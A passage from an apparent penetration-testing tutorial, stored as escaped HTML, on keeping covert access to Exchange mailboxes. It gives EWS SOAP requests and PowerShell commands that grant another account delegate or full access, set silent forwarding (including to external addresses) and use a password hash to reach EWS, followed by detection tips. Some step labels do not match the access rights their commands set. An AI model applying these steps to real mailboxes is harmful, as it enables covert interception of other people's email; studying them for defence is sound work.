\u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>true\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:updatedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove access permissions using RemoveDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fremovedelegate-operation\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:removedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:userids>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>    \u003C\u002Fm:userids>\u003Cbr>    \u003C\u002Fm:removedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2.UpdateFolder\u003C\u002Fh4>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fexchange-web-services\u002Fhow-to-set-folder-permissions-for-another-user-by-using-ews-in-exchange\u003C\u002Fp>\u003Cp>Check the access permissions for user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getfolder>\u003Cbr>      \u003Cm:foldershape>\u003Cbr>        \u003Ct:baseshape>IdOnly\u003C\u002Ft:baseshape>\u003Cbr>        \u003Ct:additionalproperties>\u003Cbr>          \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>        \u003C\u002Ft:fielduri>\u003C\u002Ft:additionalproperties>\u003Cbr>      \u003C\u002Fm:foldershape>\u003Cbr>      \u003Cm:folderids>\u003Cbr>        \u003Ct:distinguishedfolderid id=\"inbox\">\u003Cbr>      \u003C\u002Ft:distinguishedfolderid>\u003C\u002Fm:folderids>\u003Cbr>    \u003C\u002Fm:getfolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permission to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:permissionlevel>Editor\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It is important to note that the UpdateFolder operation will overwrite existing settings, so a delete operation is equivalent to restoring the permission configuration information.\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code.\u003C\u002Fp>\u003Ch3>3. Implementation via PowerShell\u003C\u002Fh3>\u003Cp>Commands for managing mailboxes need to be executed on the Exchange server.\u003C\u002Fp>\u003Cp>First, you need to add the dependency package:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The management snap-in names vary for different Exchange versions:\u003C\u002Fp>\u003Cul>\u003Cli>Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;\u003C\u002Fli>\u003Cli>Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;\u003C\u002Fli>\u003Cli>Exchange 2013 &amp; 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fli>\u003C\u002Ful>\u003Cp>View the access permissions for user test2's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxFolderPermission -Identity test2@test.com:\\Inbox|fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add read permission for user test2 to user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -AccessRights Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove user test2's read permission for user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Method to Continuously Obtain Exchange User Inbox Emails by Adding Mail Functionality\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Add forwarding functionality via EAC\u003C\u002Fh3>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Frecipients\u002Fuser-mailboxes\u002Femail-forwarding?view=exchserver-2016\u003C\u002Fp>\u003Cp>Requires access to Exchange Admin Center (EAC), i.e., Exchange administrator permissions and access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in to ECP using Exchange administrator credentials\u003C\u002Fp>\u003Cp>Locate user test1 and edit, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017393631_4_dd4a22b5c5-1.jpeg\">\u003C\u002Fp>\u003Cp>Select Mailbox Features -&gt; Mail Flow -&gt; select View details\u003C\u002Fp>\u003Cp>Select Enable forwarding, add user, choose Deliver message to both forwarding address and mailbox, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017431017_5_9a43d63738-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the forwarding function setup is complete\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the message will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implement via Exchange Management Shell\u003C\u002Fh3>\u003Cp>Exchange Management Shell can be launched in the following three ways:\u003C\u002Fp>\u003Cp>(1) Run Exchange Management Shell directly on the Exchange Server\u003C\u002Fp>\u003Cp>(2) Start PowerShell on the Exchange Server and enter the command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003Cp>(3) Connect to the Exchange server using PSSession\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Penetration Basics – Searching and Exporting Emails from Exchange Servers'\u003C\u002Fp>\u003Cp>The PowerShell command to add forwarding of emails from user test1's inbox to user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-Mailbox -Identity \"test1\" -ForwardingAddress \"test2\" -DeliverToMailboxAndForward $true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If forwarding emails to an unverified external email address, replace ForwardingAddress with ForwardingSmtpAddress\u003C\u002Fp>\u003Ch2>0x05 Method to Add User Permissions for Persistent Access to Exchange User Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-mailboxpermission?view=exchange-ps\u003C\u002Fp>\u003Cp>The PowerShell command to add full access permissions for user test1 to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -InheritanceType All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to view the mailbox access permissions for user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxPermission -Identity test2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove user test1's full access permissions to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add-RecipientPermission can only be used in cloud-based services. Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-recipientpermission?view=exchange-ps\u003C\u002Fp>\u003Ch2>0x06 Open Source Code\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In practical use, if only the hash of a mail user is available, it is not possible to add mail forwarding rules via OWA and ECP.\u003C\u002Fp>\u003Cp>However, we can first log in to EWS using the hash, then send SOAP messages through a program to achieve this.\u003C\u002Fp>\u003Cp>Here, using the previously open-source program ewsManage.py as a template, the following features have been added:\u003C\u002Fp>\u003Cul>\u003Cli>getdelegateofinbox\u003C\u002Fli>\u003Cli>adddelegateofinbox\u003C\u002Fli>\u003Cli>updatedelegateofinbox\u003C\u002Fli>\u003Cli>removedelegateofinbox\u003C\u002Fli>\u003Cli>getdelegateofsentitems\u003C\u002Fli>\u003Cli>updatedelegateofsentitems\u003C\u002Fli>\u003Cli>restoredelegateofsentitems\u003C\u002Fli>\u003Cli>getinboxrules\u003C\u002Fli>\u003Cli>updateinboxrules\u003C\u002Fli>\u003Cli>removeinboxrules\u003C\u002Fli>\u003C\u002Ful>\u003Cp>GitHub code has been updated, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x07 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. View forwarding rules for a single mail user\u003C\u002Fp>\u003Cp>Access Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in, view organize email -&gt; inbox rules\u003C\u002Fp>\u003Cp>2. View access permissions for a single mail user\u003C\u002Fp>\u003Cp>Access Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in, view Inbox-&gt;permissions...\u003C\u002Fp>\u003Cp>3. Check the inbox forwarding function for all mail users\u003C\u002Fp>\u003Cp>Run Exchange Management Shell, view the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Mailbox|Select-Object UserPrincipalName,ForwardingAddress,ForwardingSmtpAddress\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces four methods to continuously obtain Exchange user inbox emails, provides open-source implementation code via SOAP XML messages, supports usage under hash-only conditions, and offers defense recommendations combined with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1164,"Onedaysec",8,"published","2026-02-02T07:51:00.263Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Exchange Email Persistence: Forwarding Rules & Access Permissions","Exchange security, email persistence, forwarding rules, access permissions, penetration testing, email defense",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46,47],439,438,437,436,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.342Z","2026-07-23T16:01:34.982Z","draft","2026-07-23T16:06:18.737Z"]